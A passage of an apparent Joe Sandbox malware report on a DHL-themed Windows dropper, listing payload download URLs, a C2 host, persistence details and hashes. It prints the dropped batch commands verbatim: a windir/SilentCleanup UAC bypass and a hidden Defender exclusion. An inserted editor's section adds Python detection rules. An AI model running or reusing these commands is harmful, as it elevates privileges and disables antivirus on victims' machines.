https://bl30uw.sn.files.1drv.com/y4maOmpRLgEZgKpnLv-hczrMb96VqtMQDZd-m0g51QRpK-v8c65WYNUi2NOLDdGNQiU | Iqzenco.exe, 00000010.00000003.752060770.00000000007A3000.00000004.00000001.sdmp | false | | high
https://bl30uw.sn.files.1drv.com/y4msI7_EyjC8cs97rdyt7ReCTl2WoedGiqx9hVOiugfpodFj4cXgoX5lAQfrGe41zrt | Iqzenco.exe, 00000010.00000003.750846747.00000000007A3000.00000004.00000001.sdmp | false | | high
https://onedrive.live.com/download?cid=97429F42E815B766&resid=97429F42E815B766%21166&authkey=AFRFbbm | Iqzenco.exe, 00000010.00000003.752060770.00000000007A3000.00000004.00000001.sdmp | false | | high
https://bl30uw.sn.files.1drv.com/y4mGst0byrg6Ub0CK8iKHaximJI4M7D1uUmqxfl02ZpIfKXbkyeYXQLL6P2J6UxS4Yz | Iqzenco.exe, 00000010.00000003.750864485.00000000007B1000.00000004.00000001.sdmp | false | | high

                            Contacted IPs

                            Public

IP | Domain | Country | ASN | ASN Name | Malicious
185.140.53.15 | ongod4ever.ddns.net | Sweden | 209623 | DAVID_CRAIGGG | false

                            Private

                            IP
                            192.168.2.1

                            General Information

                            Joe Sandbox Version:33.0.0 White Diamond
                            Analysis ID:491719
                            Start date:27.09.2021
                            Start time:20:38:59
                            Joe Sandbox Product:CloudBasic
                            Overall analysis duration:0h 13m 28s
                            Hypervisor based Inspection enabled:false
                            Report type:full
                            Sample file name:ENTREGA DE DOCUMENTOS DHL _ 27-09-21,pdf.exe
                            Cookbook file name:default.jbs
                            Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of new started processes analysed:28
                            Number of new started drivers analysed:0
                            Number of existing processes analysed:0
                            Number of existing drivers analysed:0
                            Number of injected processes analysed:0
                            Technologies:
                            • HCA enabled
                            • EGA enabled
                            • HDC enabled
                            • AMSI enabled
                            Analysis Mode:default
                            Analysis stop reason:Timeout
                            Detection:MAL
                            Classification:mal100.troj.spyw.evad.winEXE@23/10@49/2
                            EGA Information:Failed
                            HDC Information:
                            • Successful, ratio: 44.2% (good quality ratio 42.2%)
                            • Quality average: 83.9%
                            • Quality standard deviation: 25.5%
                            HCA Information:
                            • Successful, ratio: 97%
                            • Number of executed functions: 15
                            • Number of non-executed functions: 166
                            Cookbook Comments:
                            • Adjust boot time
                            • Enable AMSI
                            • Found application associated with file extension: .exe
                            Warnings:
                            Show All
                            • Exclude process from analysis (whitelisted): BackgroundTransferHost.exe, backgroundTaskHost.exe, svchost.exe, wuapihost.exe
                            • Excluded IPs from analysis (whitelisted): 20.82.210.154, 2.20.86.117, 13.107.43.13, 13.107.42.12, 20.82.209.183, 209.197.3.8, 13.107.42.13, 20.54.110.249, 40.112.88.60, 23.10.249.43, 23.10.249.26, 20.50.102.62
                            • Excluded domains from analysis (whitelisted): odc-web-brs.onedrive.akadns.net, store-images.s-microsoft.com-c.edgekey.net, iris-de-prod-azsc-neu-b.northeurope.cloudapp.azure.com, a1449.dscg2.akamai.net, arc.msn.com, l-0004.dc-msedge.net, l-0004.l-msedge.net, e12564.dspb.akamaiedge.net, odwebpl.trafficmanager.net.l-0004.dc-msedge.net.l-0004.l-msedge.net, l-0003.l-msedge.net, consumer-displaycatalogrp-aks2aks-europe.md.mp.microsoft.com.akadns.net, arc.trafficmanager.net, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, sn-files.ha.1drv.com.l-0003.dc-msedge.net.l-0003.l-msedge.net, iris-de-prod-azsc-neu.northeurope.cloudapp.azure.com, odc-web-geo.onedrive.akadns.net, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, wu-shim.trafficmanager.net, neu-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, ris-prod.trafficmanager.net, odc-sn-files-geo.onedrive.akadns.net, asf-ris-prod-neu.northeurope.cloudapp.azure.com, ctldl.windowsupdate.com, cds.d2s7q6s2.hwcdn.net, iris-de-prod-azsc-uks.uksouth.cloudapp.azure.com, ris.api.iris.microsoft.com, odc-sn-files-brs.onedrive.akadns.net, store-images.s-microsoft.com, displaycatalog-rp.md.mp.microsoft.com.akadns.net
                            • Not all processes where analyzed, report is missing behavior information
                            • Report creation exceeded maximum time and may have missing disassembly code information.
                            • Report size exceeded maximum capacity and may have missing behavior information.
                            • Report size getting too big, too many NtOpenKeyEx calls found.
                            • Report size getting too big, too many NtProtectVirtualMemory calls found.
                            • Report size getting too big, too many NtQueryValueKey calls found.

                            Simulations

                            Behavior and APIs

Time | Type | Description
20:39:58 | API Interceptor | 2x Sleep call for process: ENTREGA DE DOCUMENTOS DHL _ 27-09-21,pdf.exe modified
20:40:22 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Iqzenco C:\Users\Public\Libraries\ocnezqI.url
20:40:30 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Iqzenco C:\Users\Public\Libraries\ocnezqI.url
20:40:34 | API Interceptor | 2x Sleep call for process: Iqzenco.exe modified

                            Joe Sandbox View / Context

                            IPs

                            No context

                            Domains

                            No context

                            ASN

                            No context

                            JA3 Fingerprints

                            No context

                            Dropped Files

                            No context

                            Created / dropped Files

                            C:\Users\Public\KDECO.bat
                            Process:C:\Users\user\Desktop\ENTREGA DE DOCUMENTOS DHL _ 27-09-21,pdf.exe
                            File Type:ASCII text, with no line terminators
                            Category:dropped
                            Size (bytes):155
                            Entropy (8bit):4.687076340713226
                            Encrypted:false
                            SSDEEP:3:LjT5LJJFIf9oM3KN6QNb3DM9bWQqA5SkrF2VCceGAFddGeWLCXlRA3+OR:rz81R3KnMMQ75ieGgdEYlRA/R
                            MD5:213C60ADF1C9EF88DC3C9B2D579959D2
                            SHA1:E4D2AD7B22B1A8B5B1F7A702B303C7364B0EE021
                            SHA-256:37C59C8398279916CFCE45F8C5E3431058248F5E3BEF4D9F5C0F44A7D564F82E
                            SHA-512:FE897D9CAA306B0E761B2FD61BB5DC32A53BFAAD1CE767C6860AF4E3AD59C8F3257228A6E1072DAB0F990CB51C59C648084BA419AC6BC5C0A99BDFFA569217B7
                            Malicious:false
                            Reputation:unknown
                            Preview: start /min powershell -WindowStyle Hidden -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath 'C:\Users'" & exit
                            C:\Users\Public\Libraries\Iqzenco\Iqzenco.exe
                            Process:C:\Users\user\Desktop\ENTREGA DE DOCUMENTOS DHL _ 27-09-21,pdf.exe
                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                            Category:dropped
                            Size (bytes):1009152
                            Entropy (8bit):6.9988393829759294
                            Encrypted:false
                            SSDEEP:24576:L5A8SqIkJpbDpQc6ScVHdPaHxA7VhLRYF:Lr5ZoHdPaRyzKF
                            MD5:3808D4A11CBEE20896CCA28F9A3BCB9B
                            SHA1:B3A533D6E00ACE2EC0612C9AF66C6DD69C5180B3
                            SHA-256:53C2E53D33F80E88B16CCE06621F99680E0E5F387315CB81AF97CEE58080165A
                            SHA-512:980425EFD3D01A3C5ADBBD3873D819AF60C1E62A9B32149B01F1C1E6DE338D068B53C18AD4645C66E8C13DB8F21440F2E0C01B27E3B1E4AF55D19474EC83A5FD
                            Malicious:true
                            Antivirus:
                            • Antivirus: ReversingLabs, Detection: 24%
                            Reputation:unknown
                            Preview: MZ......................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^.*.................j...........z............@..............................................@...............................(......./...................@..0r...........0...............0..........................X....................................].......^.................. ..`........P....p.......b.............. ..`.........&.......(...n..............@............8.......................................(.......*..................@...........4.... ..................................0....0......................@..@........0r...@...t..................@..B........./.......0...6..............@..@.............0......................@..@................................................................................................
                            C:\Users\Public\Libraries\ocnezqI.url
                            Process:C:\Users\user\Desktop\ENTREGA DE DOCUMENTOS DHL _ 27-09-21,pdf.exe
                            File Type:MS Windows 95 Internet shortcut text (URL=<file:"C:\\Users\\Public\\Libraries\\Iqzenco\\Iqzenco.exe">), ASCII text, with CRLF line terminators
                            Category:dropped
                            Size (bytes):96
                            Entropy (8bit):4.740775825389126
                            Encrypted:false
                            SSDEEP:3:HRAbABGQYmTWAX+rSF55i0XMfiyGAywSsGKd6ov:HRYFVmTWDyzFlsbDv
                            MD5:5E9FED8C24BB01153751DF696536E82A
                            SHA1:D23E4B05254E62153D6F0158F4F869AB00C5DF15
                            SHA-256:08BC6F401999D30F1EB81AD3C9CB0EB01063CF858C9818F238ED233833947AE8
                            SHA-512:4920341592295B38653FD6DD227F99625A1E62C3E1E9CE014F506C724319528A6E45829C21B62A5674FF47BB3BD1B62FD2DB9A24583208DC7659E4B88A8BB7FD
                            Malicious:false
                            Yara Hits:
                            • Rule: Methodology_Contains_Shortcut_OtherURIhandlers, Description: Detects possible shortcut usage for .URL persistence, Source: C:\Users\Public\Libraries\ocnezqI.url, Author: @itsreallynick (Nick Carr)
                            Reputation:unknown
                            Preview: [InternetShortcut]..URL=file:"C:\\Users\\Public\\Libraries\\Iqzenco\\Iqzenco.exe"..IconIndex=2..
                            C:\Users\Public\Trast.bat
                            Process:C:\Users\user\Desktop\ENTREGA DE DOCUMENTOS DHL _ 27-09-21,pdf.exe
                            File Type:ASCII text, with no line terminators
                            Category:dropped
                            Size (bytes):34
                            Entropy (8bit):4.314972767530033
                            Encrypted:false
                            SSDEEP:3:LjTnaHF5wlM:rnaHSM
                            MD5:4068C9F69FCD8A171C67F81D4A952A54
                            SHA1:4D2536A8C28CDCC17465E20D6693FB9E8E713B36
                            SHA-256:24222300C78180B50ED1F8361BA63CB27316EC994C1C9079708A51B4A1A9D810
                            SHA-512:A64F9319ACC51FFFD0491C74DCD9C9084C2783B82F95727E4BFE387A8528C6DCF68F11418E88F1E133D115DAF907549C86DD7AD866B2A7938ADD5225FBB2811D
                            Malicious:false
                            Reputation:unknown
                            Preview: start /min C:\Users\Public\UKO.bat
                            C:\Users\Public\UKO.bat
                            Process:C:\Users\user\Desktop\ENTREGA DE DOCUMENTOS DHL _ 27-09-21,pdf.exe
                            File Type:ASCII text, with CRLF line terminators
                            Category:dropped
                            Size (bytes):250
                            Entropy (8bit):4.865356627324657
                            Encrypted:false
                            SSDEEP:6:rgnMXd1CQnMXd1COm8hnaHNHIXUnMXd1CoD9c1uOw1H1gOvOBAn:rgamIHIXUaXe1uOeVqy
                            MD5:EAF8D967454C3BBDDBF2E05A421411F8
                            SHA1:6170880409B24DE75C2DC3D56A506FBFF7F6622C
                            SHA-256:F35F2658455A2E40F151549A7D6465A836C33FA9109E67623916F889849EAC56
                            SHA-512:FE5BE5C673E99F70C93019D01ABB0A29DD2ECF25B2D895190FF551F020C28E7D8F99F65007F440F0F76C5BCAC343B2A179A94D190C938EA3B9E1197890A412E9
                            Malicious:false
                            Reputation:unknown
                            Preview: reg delete hkcu\Environment /v windir /f..reg add hkcu\Environment /v windir /d "cmd /c start /min C:\Users\Public\KDECO.bat reg delete hkcu\Environment /v windir /f && REM "..schtasks /Run /TN \Microsoft\Windows\DiskCleanup\SilentCleanup /I & exit..
                            C:\Users\Public\nest
                            Process:C:\Users\user\Desktop\ENTREGA DE DOCUMENTOS DHL _ 27-09-21,pdf.exe
                            File Type:ASCII text, with CRLF line terminators
                            Category:dropped
                            Size (bytes):9
                            Entropy (8bit):3.169925001442312
                            Encrypted:false
                            SSDEEP:3:1xn:Hn
                            MD5:4D2B6925406544EEF7111380E2243791
                            SHA1:A32A8FA6F2E46D8E86FA92BEA3B8D45EB168BD04
                            SHA-256:09A841DC20255A929B3CCFA47B08B8E47ADD965FF3070E8DAB1DBD050D73E97F
                            SHA-512:EFDD6C90C7EAA5D05FDD079A61B969837B350CB20AECC7CF24533636956A939B8A289B2C3BB4A7AC21BBACF818E394A13D8661427EACFC0F21C46D5855DFFEDF
                            Malicious:false
                            Reputation:unknown
                            Preview: Iqzenco..
                            C:\Users\Public\nest.bat
                            Process:C:\Users\user\Desktop\ENTREGA DE DOCUMENTOS DHL _ 27-09-21,pdf.exe
                            File Type:ASCII text, with CRLF line terminators
                            Category:dropped
                            Size (bytes):53
                            Entropy (8bit):4.263285494083192
                            Encrypted:false
                            SSDEEP:3:LjT9fnMXdemzCK0vn:rZnMXd1CV
                            MD5:8ADA51400B7915DE2124BAAF75E3414C
                            SHA1:1A7B9DB12184AB7FD7FCE1C383F9670A00ADB081
                            SHA-256:45AA3957C29865260A78F03EEF18AE9AEBDBF7BEA751ECC88BE4A799F2BB46C7
                            SHA-512:9AFC138157A4565294CA49942579CDB6F5D8084E56F9354738DE62B585F4C0FA3E7F2CBC9541827F2084E3FF36C46EED29B46F5DD2444062FFCD05C599992E68
                            Malicious:false
                            Reputation:unknown
                            Preview: start /min reg delete hkcu\Environment /v windir /f..
                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9026IKNJ\Iqzencolmjnhoxprppdkgkfyidrxfas[1]
                            Process:C:\Users\Public\Libraries\Iqzenco\Iqzenco.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):873984
                            Entropy (8bit):7.9969159829391385
                            Encrypted:true
                            SSDEEP:24576:WkRi6BScPafSfJKPyZ/Sba3koow5ba33m6YwEcds:WobBLafgJKPyZ/MpoaW6YP
                            MD5:6CFF8FAF4A45291638E775B0EB1DF24D
                            SHA1:472E6F7B86A62F191AD8A231CE58F356A046A2F7
                            SHA-256:195306105A3F635EA75E8D8E02987BB106B62C75AA1A6F4914A287E8DB424631
                            SHA-512:F23B002AC8D7060D065B7DAFA6AD39C07ED5AD5CE20394B88CCB65B7EBD74EA31EBC4710F853FF6DAA2926CC747AF797FBE3E8E01A79DDDD169E7AB9E9978308
                            Malicious:false
                            Reputation:unknown
                            Preview: .....6....M....7.Z..._cw S]b....).....T.....4....o...$X....*m.......L5.8.5..6....M....7.Z..._cw S]b....).....T.....4....o...$X....*m.......L5.8.5..6....M....7.Z..._cw S]b....).....T.....4....o...$X....*m.......L5.8.5..6....M....7.Z..._cw S]b....).....T.....4....o...$X....*m.......L5.8.5..6....M....7.Z..._cw S]%......(& ...P...sZ.G..W#..v..FN.}r...kG.....c2>.......K.(& &!.)....7..6G..U..9.v..FN.}r...l.)....n.7..N.}r...oP..oP......2>X...X.u.;.....:.|..y1.-..n....6.X..OWOT...'.v....G..<.cgn.R.X........u.8..>5..{....wT.I....#......{..........).H t...wT.I....#......{..........&N.n..+..u.U"OT..t..X.....X....u.8..>5..{....wT.I....#......{..........|+m.z..h4.?9+Q........Nk....^U...y..I.u.....o...!{.M..dK.$....s.5;....m.Y..mr..".*...y...\.y..>.....F.;..k..a.......%~.....i.s.q.n!g.....+Ne.*.[.~...y..Ra.C..9<..q....J.v.......u.#a.Vp770./PdXs.......{.P`L..=8..{...]......96... .~...9 ..v..`Q...Zl/V|....'.r3;.u.>..1U..bU..j.V}..154...
                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\CS6IXJW6\Iqzencolmjnhoxprppdkgkfyidrxfas[1]
                            Process:C:\Users\user\Desktop\ENTREGA DE DOCUMENTOS DHL _ 27-09-21,pdf.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):873984
                            Entropy (8bit):7.9969159829391385
                            Encrypted:true
                            SSDEEP:24576:WkRi6BScPafSfJKPyZ/Sba3koow5ba33m6YwEcds:WobBLafgJKPyZ/MpoaW6YP
                            MD5:6CFF8FAF4A45291638E775B0EB1DF24D
                            SHA1:472E6F7B86A62F191AD8A231CE58F356A046A2F7
                            SHA-256:195306105A3F635EA75E8D8E02987BB106B62C75AA1A6F4914A287E8DB424631
                            SHA-512:F23B002AC8D7060D065B7DAFA6AD39C07ED5AD5CE20394B88CCB65B7EBD74EA31EBC4710F853FF6DAA2926CC747AF797FBE3E8E01A79DDDD169E7AB9E9978308
                            Malicious:false
                            Reputation:unknown
                            Preview: .....6....M....7.Z..._cw S]b....).....T.....4....o...$X....*m.......L5.8.5..6....M....7.Z..._cw S]b....).....T.....4....o...$X....*m.......L5.8.5..6....M....7.Z..._cw S]b....).....T.....4....o...$X....*m.......L5.8.5..6....M....7.Z..._cw S]b....).....T.....4....o...$X....*m.......L5.8.5..6....M....7.Z..._cw S]%......(& ...P...sZ.G..W#..v..FN.}r...kG.....c2>.......K.(& &!.)....7..6G..U..9.v..FN.}r...l.)....n.7..N.}r...oP..oP......2>X...X.u.;.....:.|..y1.-..n....6.X..OWOT...'.v....G..<.cgn.R.X........u.8..>5..{....wT.I....#......{..........).H t...wT.I....#......{..........&N.n..+..u.U"OT..t..X.....X....u.8..>5..{....wT.I....#......{..........|+m.z..h4.?9+Q........Nk....^U...y..I.u.....o...!{.M..dK.$....s.5;....m.Y..mr..".*...y...\.y..>.....F.;..k..a.......%~.....i.s.q.n!g.....+Ne.*.[.~...y..Ra.C..9<..q....J.v.......u.#a.Vp770./PdXs.......{.P`L..=8..{...]......96... .~...9 ..v..`Q...Zl/V|....'.r3;.u.>..1U..bU..j.V}..154...
                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OR0WKIO1\Iqzencolmjnhoxprppdkgkfyidrxfas[1]
                            Process:C:\Users\Public\Libraries\Iqzenco\Iqzenco.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):873984
                            Entropy (8bit):7.9969159829391385
                            Encrypted:true
                            SSDEEP:24576:WkRi6BScPafSfJKPyZ/Sba3koow5ba33m6YwEcds:WobBLafgJKPyZ/MpoaW6YP
                            MD5:6CFF8FAF4A45291638E775B0EB1DF24D
                            SHA1:472E6F7B86A62F191AD8A231CE58F356A046A2F7
                            SHA-256:195306105A3F635EA75E8D8E02987BB106B62C75AA1A6F4914A287E8DB424631
                            SHA-512:F23B002AC8D7060D065B7DAFA6AD39C07ED5AD5CE20394B88CCB65B7EBD74EA31EBC4710F853FF6DAA2926CC747AF797FBE3E8E01A79DDDD169E7AB9E9978308
                            Malicious:false
                            Reputation:unknown
                            Preview: .....6....M....7.Z..._cw S]b....).....T.....4....o...$X....*m.......L5.8.5..6....M....7.Z..._cw S]b....).....T.....4....o...$X....*m.......L5.8.5..6....M....7.Z..._cw S]b....).....T.....4....o...$X....*m.......L5.8.5..6....M....7.Z..._cw S]b....).....T.....4....o...$X....*m.......L5.8.5..6....M....7.Z..._cw S]%......(& ...P...sZ.G..W#..v..FN.}r...kG.....c2>.......K.(& &!.)....7..6G..U..9.v..FN.}r...l.)....n.7..N.}r...oP..oP......2>X...X.u.;.....:.|..y1.-..n....6.X..OWOT...'.v....G..<.cgn.R.X........u.8..>5..{....wT.I....#......{..........).H t...wT.I....#......{..........&N.n..+..u.U"OT..t..X.....X....u.8..>5..{....wT.I....#......{..........|+m.z..h4.?9+Q........Nk....^U...y..I.u.....o...!{.M..dK.$....s.5;....m.Y..mr..".*...y...\.y..>.....F.;..k..a.......%~.....i.s.q.n!g.....+Ne.*.[.~...y..Ra.C..9<..q....J.v.......u.#a.Vp770./PdXs.......{.P`L..=8..{...]......96... .~...9 ..v..`Q...Zl/V|....'.r3;.u.>..1U..bU..j.V}..154...
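The dropped batch files above form one chain: Trast.bat starts UKO.bat; UKO.bat writes a command string into the user-scope environment value HKCU\Environment\windir and then runs the built-in scheduled task \Microsoft\Windows\DiskCleanup\SilentCleanup, whose action expands %windir% and runs at the task's elevated level, so the planted command (which launches KDECO.bat) runs without a UAC prompt; KDECO.bat adds a Windows Defender exclusion for C:\Users with Add-MpPreference; nest.bat removes the windir value again. Persistence is the Run-key entry from the Simulations section, which points at ocnezqI.url, an Internet Shortcut whose file: URL launches the dropped Iqzenco.exe. The following is an added example by the editor, not part of the sandbox report: detection logic for each step of that chain, plus the remote-thread injection from the behavior graph, run over constructed Sysmon-style events that mirror the report's command lines. The event field names, the rule wording and the list of risky shortcut targets are the editor's assumptions.

```python
"""Added example (not from the report): flag the UAC-bypass / defence-evasion /
persistence chain seen in the dropped batch files, and the .url autostart."""
import re
from configparser import ConfigParser

# Constructed Sysmon-style events, modelled on the report's command lines.
# Field names are assumptions; only the command lines come from the report.
SAMPLE_EVENTS = [
    {"type": "process", "image": r"C:\Windows\System32\reg.exe",
     "cmdline": r'reg add hkcu\Environment /v windir /d "cmd /c start /min C:\Users\Public\KDECO.bat reg delete hkcu\Environment /v windir /f && REM "'},
    {"type": "process", "image": r"C:\Windows\System32\schtasks.exe",
     "cmdline": r"schtasks /Run /TN \Microsoft\Windows\DiskCleanup\SilentCleanup /I"},
    {"type": "process", "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell -WindowStyle Hidden -NonInteractive -Command \"Add-MpPreference -ExclusionPath 'C:\\Users'\""},
    {"type": "registry", "key": r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run",
     "value": "Iqzenco", "data": r"C:\Users\Public\Libraries\ocnezqI.url"},
    {"type": "remote_thread", "source": r"C:\Users\user\Desktop\ENTREGA DE DOCUMENTOS DHL _ 27-09-21,pdf.exe",
     "target": r"C:\Windows\System32\mobsync.exe"},
    {"type": "process", "image": r"C:\Windows\System32\reg.exe",
     "cmdline": r"reg delete hkcu\Environment /v windir /f"},   # clean-up step, not flagged alone
    {"type": "process", "image": r"C:\Windows\System32\notepad.exe",
     "cmdline": r"notepad.exe C:\Users\user\notes.txt"},         # benign control event
]


def _cmd(e):
    return e.get("cmdline", "")


# (title, predicate) pairs; each predicate checks the event type first so that
# fields missing on other event types are never touched.
RULES = [
    ("user-scope windir set to a command (SilentCleanup UAC bypass staging)",
     lambda e: e["type"] == "process"
     and re.search(r"\breg(?:\.exe)?\s+add\s+hkcu\\environment\s+/v\s+windir\b", _cmd(e), re.I)),
    ("SilentCleanup scheduled task run on demand from a user process",
     lambda e: e["type"] == "process"
     and re.search(r"\bschtasks\b.*?/run\b.*?\\DiskCleanup\\SilentCleanup", _cmd(e), re.I)),
    ("Defender exclusion added with Add-MpPreference",
     lambda e: e["type"] == "process"
     and re.search(r"Add-MpPreference\s+-Exclusion", _cmd(e), re.I)),
    ("Run-key autostart pointing at a .url shortcut",
     lambda e: e["type"] == "registry"
     and e["key"].lower().endswith("\\currentversion\\run")
     and e["data"].lower().endswith(".url")),
    ("remote thread created in a Windows system binary by a non-system image",
     lambda e: e["type"] == "remote_thread"
     and e["target"].lower().startswith("c:\\windows\\")
     and not e["source"].lower().startswith("c:\\windows\\")),
]


def scan(events):
    """Return (rule title, evidence) for every event that matches a rule."""
    hits = []
    for e in events:
        for title, match in RULES:
            if match(e):
                hits.append((title, e.get("cmdline") or e.get("data") or e.get("target")))
    return hits


# The dropped ocnezqI.url, reproduced from the report's preview (CRLF, file: URL).
URL_FILE = (
    "[InternetShortcut]\r\n"
    'URL=file:"C:\\\\Users\\\\Public\\\\Libraries\\\\Iqzenco\\\\Iqzenco.exe"\r\n'
    "IconIndex=2\r\n"
)

# Extensions a .url should never need to point at; an assumed list.
RISKY_TARGET_EXT = (".exe", ".scr", ".bat", ".cmd", ".js", ".vbs", ".hta", ".ps1", ".dll")


def shortcut_target(text):
    """Return (scheme, target) from an Internet Shortcut (.url) file body."""
    cp = ConfigParser(interpolation=None, delimiters=("=",))
    cp.read_string(text.replace("\r\n", "\n"))
    url = cp.get("InternetShortcut", "URL", fallback="")
    scheme, _, rest = url.partition(":")
    return scheme.strip().lower(), rest.strip().strip('"')


def shortcut_is_suspicious(text):
    """True when the shortcut uses the file: handler to launch a local executable."""
    scheme, target = shortcut_target(text)
    return scheme == "file" and target.lower().endswith(RISKY_TARGET_EXT)


if __name__ == "__main__":
    for title, evidence in scan(SAMPLE_EVENTS):
        print(f"[{title}] {evidence}")
    print("ocnezqI.url suspicious:", shortcut_is_suspicious(URL_FILE))
```

The rules fire on the attacker's own artefacts rather than on the sample's hash, so they survive a repack of the dropper. In production, the windir rule deserves a high severity on its own: no legitimate software sets a user-scope windir value to a command string, and the SilentCleanup task being run on demand right after it is the elevation trigger.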

                            Static File Info

                            General

                            File type:PE32 executable (GUI) Intel 80386, for MS Windows
                            Entropy (8bit):6.9988393829759294
                            TrID:
                            • Win32 Executable (generic) a (10002005/4) 99.94%
                            • Win16/32 Executable Delphi generic (2074/23) 0.02%
                            • Generic Win/DOS Executable (2004/3) 0.02%
                            • DOS Executable Generic (2002/1) 0.02%
                            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                            File name:ENTREGA DE DOCUMENTOS DHL _ 27-09-21,pdf.exe
                            File size:1009152
                            MD5:3808d4a11cbee20896cca28f9a3bcb9b
                            SHA1:b3a533d6e00ace2ec0612c9af66c6dd69c5180b3
                            SHA256:53c2e53d33f80e88b16cce06621f99680e0e5f387315cb81af97cee58080165a
                            SHA512:980425efd3d01a3c5adbbd3873d819af60c1e62a9b32149b01f1c1e6de338d068b53c18ad4645c66e8c13db8f21440f2e0c01b27e3b1e4af55d19474ec83a5fd
                            SSDEEP:24576:L5A8SqIkJpbDpQc6ScVHdPaHxA7VhLRYF:Lr5ZoHdPaRyzKF
                            File Content Preview:MZ......................@...............................................!..L.!..This program must be run under Win32..$7.......................................................................................................................................

                            File Icon

                            Icon Hash:d2e6c45663c86871

                            Static PE Info

                            General

                            Entrypoint:0x477a08
                            Entrypoint Section:......
                            Digitally signed:false
                            Imagebase:0x400000
                            Subsystem:windows gui
                            Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, BYTES_REVERSED_LO, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, BYTES_REVERSED_HI
                            DLL Characteristics:
                            Time Stamp:0x2A2E5E19 [Thu Jun 4 18:16:57 1992 UTC]
                            TLS Callbacks:
                            CLR (.Net) Version:
                            OS Version Major:4
                            OS Version Minor:0
                            File Version Major:4
                            File Version Minor:0
                            Subsystem Version Major:4
                            Subsystem Version Minor:0
                            Import Hash:7485e319df85e87afca01bdc77d12961

                            Entrypoint Preview

                            Instruction
                            push ebp
                            mov ebp, esp
                            add esp, FFFFFFF0h
                            mov eax, 00476B38h
                            call 00007F8F78AFEEADh
                            mov eax, dword ptr [0047A460h]
                            mov eax, dword ptr [eax]
                            call 00007F8F78B53339h
                            mov ecx, dword ptr [0047A270h]
                            mov eax, dword ptr [0047A460h]
                            mov eax, dword ptr [eax]
                            mov edx, dword ptr [0047656Ch]
                            call 00007F8F78B53339h
                            mov eax, dword ptr [0047A460h]
                            mov eax, dword ptr [eax]
                            call 00007F8F78B533ADh
                            call 00007F8F78AFCD1Ch
                            lea eax, dword ptr [eax+00h]
add byte ptr [eax], al   (this line, the decoding of two zero bytes, repeats 64 times: the rest of the preview is zero padding after the entry stub)

                            Data Directories

                            Name | Virtual Address | Virtual Size | Is in Section
                            IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
                            IMAGE_DIRECTORY_ENTRY_IMPORT | 0x7f000 | 0x28e6 | ......
                            IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x8c000 | 0x72fc2 | .....
                            IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                            IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
                            IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x84000 | 0x7230 | ......
                            IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x83018 | 0x18 | ......
                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                            IMAGE_DIRECTORY_ENTRY_TLS | 0x83000 | 0x18 | ......
                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                            IMAGE_DIRECTORY_ENTRY_IAT | 0x7f7ac | 0x658 | ......
                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
                            IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |

                            Sections

                            Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                            ..... | 0x1000 | 0x75dc0 | 0x75e00 | False | 0.529974151644 | data | 6.5690645697 | IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                            ...... | 0x77000 | 0xa50 | 0xc00 | False | 0.535807291667 | data | 5.68654279388 | IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                            ..... | 0x78000 | 0x2604 | 0x2800 | False | 0.41875 | data | 4.27539272227 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                            .... | 0x7b000 | 0x38d8 | 0x0 | False | 0 | empty | 0.0 | IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                            ...... | 0x7f000 | 0x28e6 | 0x2a00 | False | 0.317057291667 | data | 5.12299679952 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                            .... | 0x82000 | 0x34 | 0x0 | False | 0 | empty | 0.0 | IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                            ...... | 0x83000 | 0x30 | 0x200 | False | 0.1015625 | data | 0.606751191078 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
